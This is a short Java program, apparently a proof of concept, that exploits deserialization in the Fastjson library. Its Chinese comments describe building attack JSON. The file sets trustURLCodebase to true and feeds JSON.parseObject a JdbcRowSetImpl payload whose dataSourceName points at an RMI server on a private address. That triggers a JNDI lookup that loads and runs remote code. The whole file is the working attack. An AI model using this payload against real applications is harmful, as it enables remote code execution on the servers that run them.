package com.cocos;

import com.alibaba.fastjson.JSON;

public class App
{
    public static void main( String[] args ) {   //高版本的jdk可能没有开启url加载
        System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
        //构造攻击的json数据
        //这里的192.168.1.121:1099是rmi服务器的地址与端口
        String json = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://192.168.1.121:1099/TouchTestFile\",\"autoCommit\":true}";
        JSON.parseObject(json);
    }
}
